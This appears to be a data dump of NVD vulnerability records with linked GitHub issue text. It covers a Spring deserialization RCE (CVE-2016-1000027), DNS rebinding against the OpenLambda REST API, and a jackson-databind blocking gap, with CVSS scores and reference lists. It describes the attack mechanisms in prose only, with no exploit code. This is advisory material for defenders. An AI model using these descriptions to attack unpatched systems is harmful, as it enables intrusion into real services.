"https://spring.io/blog/2022/05/11/spring-framework-5-3-20-and-5-2-22-available-now" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.tenable.com/security/research/tra-2016-20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "0CCA2DB9-D481-4326-8B97-09197B2D6966", "versionEndExcluding": "6.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "spring-projects", "spring-framework" ]
**Affects:** \5.2.3.RELEASE Issue Title : Sonartype vulnerability CVE-2016-1000027 in Spring-web project Description Description from CVE Pivotal Spring Framework 4.1.4 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. Explanation The org.springframework:spring-web package is vulnerable to deserialization of untrusted data leading to Remote Code Execution (RCE). The readRemoteInvocation method in HttpInvokerServiceExporter.class does not properly verify or restrict untrusted objects prior to deserializing them. An attacker can exploit this vulnerability by sending malicious requests containing crafted objects, which when deserialized, execute arbitrary code on the vulnerable system. NOTE: This vulnerability is related to a previously reported deserialization vulnerability (CVE-2011-2894) within the package, impacting a different class. Detection The application is vulnerable by using this component under specific scenarios as listed out in the advisory. Reference: https://www.tenable.com/security/research/tra-2016-20 Recommendation There is no non-vulnerable upgrade path for this component/package. We recommend investigating alternative components or a potential mitigating control. A warning has been provided in the official Javadocs of the HttpInvokerServiceExporter class: "WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead." The developer's general advice also states: "Do not use Java serialization for external endpoints, in particular not for unauthorized ones. HTTP invoker is not a well-kept secret (or an "oversight") but rather the typical case of how a Spring application would expose serialization endpoints to begin with... he has a point that we should make this case all across our documentation, including the javadoc. But I don't really see a CVE case here, just a documentation improvement. Pivoltal will enhance their documentation for the 4.2.6 and 3.2.17 releases." Reference: https://www.tenable.com/security/research/tra-2016-20 Root Cause spring-web-5.2.3.RELEASE.jar <= org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.class : [2.5.1,) Advisories Third Party: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027 Third Party: https://www.tenable.com/security/research/tra-2016-20 CVSS Details CVE CVSS 3: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Sonatype vulnerability CVE-2016-1000027 in Spring-web project
https://api.github.com/repos/spring-projects/spring-framework/issues/24434/comments
85
2020-01-27T06:46:04Z
2025-03-12T16:51:10Z
https://github.com/spring-projects/spring-framework/issues/24434
555,385,999
24,434
975
CVE-2016-1000027
2020-01-02T23:15:11.857
Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000027.json" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2016-1000027" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230420-0009/" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://spring.io/blog/2022/05/11/spring-framework-5-3-20-and-5-2-22-available-now" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.tenable.com/security/research/tra-2016-20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-579669626" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-582313417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Exploit", "Third Party Advisory" ], "url": "https://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2016/1000xxx/CVE-2016-1000027.json" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security-tracker.debian.org/tracker/CVE-2016-1000027" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230420-0009/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://spring.io/blog/2022/05/11/spring-framework-5-3-20-and-5-2-22-available-now" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://www.tenable.com/security/research/tra-2016-20" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "0CCA2DB9-D481-4326-8B97-09197B2D6966", "versionEndExcluding": "6.0.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/spring-projects/spring-framework/issues/24434#issuecomment-744519525
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "spring-projects", "spring-framework" ]
**Affects:** \5.2.3.RELEASE Issue Title : Sonartype vulnerability CVE-2016-1000027 in Spring-web project Description Description from CVE Pivotal Spring Framework 4.1.4 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. Explanation The org.springframework:spring-web package is vulnerable to deserialization of untrusted data leading to Remote Code Execution (RCE). The readRemoteInvocation method in HttpInvokerServiceExporter.class does not properly verify or restrict untrusted objects prior to deserializing them. An attacker can exploit this vulnerability by sending malicious requests containing crafted objects, which when deserialized, execute arbitrary code on the vulnerable system. NOTE: This vulnerability is related to a previously reported deserialization vulnerability (CVE-2011-2894) within the package, impacting a different class. Detection The application is vulnerable by using this component under specific scenarios as listed out in the advisory. Reference: https://www.tenable.com/security/research/tra-2016-20 Recommendation There is no non-vulnerable upgrade path for this component/package. We recommend investigating alternative components or a potential mitigating control. A warning has been provided in the official Javadocs of the HttpInvokerServiceExporter class: "WARNING: Be aware of vulnerabilities due to unsafe Java deserialization: Manipulated input streams could lead to unwanted code execution on the server during the deserialization step. As a consequence, do not expose HTTP invoker endpoints to untrusted clients but rather just between your own services. In general, we strongly recommend any other message format (e.g. JSON) instead." The developer's general advice also states: "Do not use Java serialization for external endpoints, in particular not for unauthorized ones. HTTP invoker is not a well-kept secret (or an "oversight") but rather the typical case of how a Spring application would expose serialization endpoints to begin with... he has a point that we should make this case all across our documentation, including the javadoc. But I don't really see a CVE case here, just a documentation improvement. Pivoltal will enhance their documentation for the 4.2.6 and 3.2.17 releases." Reference: https://www.tenable.com/security/research/tra-2016-20 Root Cause spring-web-5.2.3.RELEASE.jar <= org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.class : [2.5.1,) Advisories Third Party: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027 Third Party: https://www.tenable.com/security/research/tra-2016-20 CVSS Details CVE CVSS 3: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Sonatype vulnerability CVE-2016-1000027 in Spring-web project
https://api.github.com/repos/spring-projects/spring-framework/issues/24434/comments
85
2020-01-27T06:46:04Z
2025-03-12T16:51:10Z
https://github.com/spring-projects/spring-framework/issues/24434
555,385,999
24,434
976
CVE-2019-20329
2020-01-03T00:15:11.097
OpenLambda 2019-09-10 allows DNS rebinding attacks against the OL server for the REST API on TCP port 5000.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/open-lambda/open-lambda/blob/9f7f935195ca74700c60ebc1ecfdaefad40d144b/src/common/config.go#L135" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/open-lambda/open-lambda/blob/9f7f935195ca74700c60ebc1ecfdaefad40d144b/src/server/lambdaServer.go#L92-L97" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/open-lambda/open-lambda/issues/92" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/open-lambda/open-lambda/blob/9f7f935195ca74700c60ebc1ecfdaefad40d144b/src/common/config.go#L135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/open-lambda/open-lambda/blob/9f7f935195ca74700c60ebc1ecfdaefad40d144b/src/server/lambdaServer.go#L92-L97" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/open-lambda/open-lambda/issues/92" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlambda_project:openlambda:2019-09-10:*:*:*:*:*:*:*", "matchCriteriaId": "05536DF9-2EE9-4821-BB1D-2CF74282B6C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/open-lambda/open-lambda/issues/92
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "open-lambda", "open-lambda" ]
The Rest API spawned on port 5000 isn't validating the Host header , as such the server is vulnerable to DNS Rebinding attacks. Impact : By tricking users into visiting a website, it will be possible to perform all Rest Calls on behalf of user from the attackers website, bypassing the same origin policy using DNS rebind. Few actions that the attacker can perform are invoking/running functions, read stats etc. There is also a /debug API but currently not configured, attacker can also invoke debug and do stuff based on implementation of the debug functionality.
OL-Server vulnerable to DNS Rebinding attacks.
https://api.github.com/repos/open-lambda/open-lambda/issues/92/comments
4
2019-12-16T06:22:47Z
2022-04-19T23:02:57Z
https://github.com/open-lambda/open-lambda/issues/92
538,210,224
92
977
CVE-2019-20330
2020-01-03T04:15:12.137
FasterXML jackson-databind 2.x before 2.9.10.2 lacks certain net.sf.ehcache blocking.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.10.1...jackson-databind-2.9.10.2" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2526" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r107c8737db39ec9ec4f4e7147b249e29be79170b9ef4b80528105a2d%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r2c77dd6ab8344285bd8e481b57cf3029965a4b0036eefccef74cdd44%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r3f8180d0d25a7c6473ebb9714b0c1d19a73f455ae70d0c5fefc17e6c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r428735963bee7cb99877b88d3228e28ec28af64646455c4f3e7a3c94%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r50f513772f12e1babf65c7c2b9c16425bac2d945351879e2e267517f%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r5c14fdcabdeaba258857bcb67198652e4dce1d33ddc590cd81d82393%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r5c3644c97f0434d1ceb48ff48897a67bdbf3baf7efbe7d04625425b3%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r5d3d10fdf28110da3f9ac1b7d08d7e252f98d7d37ce0a6bd139a2e4f%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r67f4d4c48197454b83d62afbed8bebbda3764e6e3a6e26a848961764%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r707d23bb9ee245f50aa909add0da6e8d8f24719b1278ddd99d2428b2%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7a0821b44247a1e6c6fe5f2943b90ebc4f80a8d1fb0aa9a8b29a59a2%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r7fb123e7dad49af5886cfec7135c0fd5b74e4c67af029e1dc91ba744%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r8831b7fa5ca87a1cf23ee08d6dedb7877a964c1d2bd869af24056a63%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/r909c822409a276ba04dc2ae31179b16f6864ba02c4f9911bdffebf95%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra2e572f568de8df5ba151e6aebb225a0629faaf0476bf7c7ed877af8%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra5ce96faec37c26b0aa15b4b6a8b1cbb145a748653e56ae83e9685d0%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/ra8a80dbc7319916946397823aec0d893d24713cbf7b5aee0e957298c%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rb532fed78d031fff477fd840b81946f6d1200f93a63698dae65aa528%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd1f346227e11fc515914f3a7b20d81543e51e5822ba71baa0452634a%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd49cfa41bbb71ef33b53736a6af2aa8ba88c2106e30f2a34902a87d2%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd6c6fef14944f3dcfb58d35f9317eb1c32a700e86c1b5231e45d3d0b%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rfa57d9c2a27d3af14c69607fb1a3da00e758b2092aa88eb6a51b6e99%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200127-0004/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.10.1...jackson-databind-2.9.10.2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2526" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r107c8737db39ec9ec4f4e7147b249e29be79170b9ef4b80528105a2d%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r2c77dd6ab8344285bd8e481b57cf3029965a4b0036eefccef74cdd44%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r3f8180d0d25a7c6473ebb9714b0c1d19a73f455ae70d0c5fefc17e6c%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r428735963bee7cb99877b88d3228e28ec28af64646455c4f3e7a3c94%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r50f513772f12e1babf65c7c2b9c16425bac2d945351879e2e267517f%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r5c14fdcabdeaba258857bcb67198652e4dce1d33ddc590cd81d82393%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r5c3644c97f0434d1ceb48ff48897a67bdbf3baf7efbe7d04625425b3%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r5d3d10fdf28110da3f9ac1b7d08d7e252f98d7d37ce0a6bd139a2e4f%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r67f4d4c48197454b83d62afbed8bebbda3764e6e3a6e26a848961764%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r707d23bb9ee245f50aa909add0da6e8d8f24719b1278ddd99d2428b2%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7a0821b44247a1e6c6fe5f2943b90ebc4f80a8d1fb0aa9a8b29a59a2%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7fb123e7dad49af5886cfec7135c0fd5b74e4c67af029e1dc91ba744%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r8831b7fa5ca87a1cf23ee08d6dedb7877a964c1d2bd869af24056a63%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r909c822409a276ba04dc2ae31179b16f6864ba02c4f9911bdffebf95%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra2e572f568de8df5ba151e6aebb225a0629faaf0476bf7c7ed877af8%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra5ce96faec37c26b0aa15b4b6a8b1cbb145a748653e56ae83e9685d0%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra8a80dbc7319916946397823aec0d893d24713cbf7b5aee0e957298c%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb532fed78d031fff477fd840b81946f6d1200f93a63698dae65aa528%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd1f346227e11fc515914f3a7b20d81543e51e5822ba71baa0452634a%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd49cfa41bbb71ef33b53736a6af2aa8ba88c2106e30f2a34902a87d2%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd6c6fef14944f3dcfb58d35f9317eb1c32a700e86c1b5231e45d3d0b%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rfa57d9c2a27d3af14c69607fb1a3da00e758b2092aa88eb6a51b6e99%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200127-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" } ]
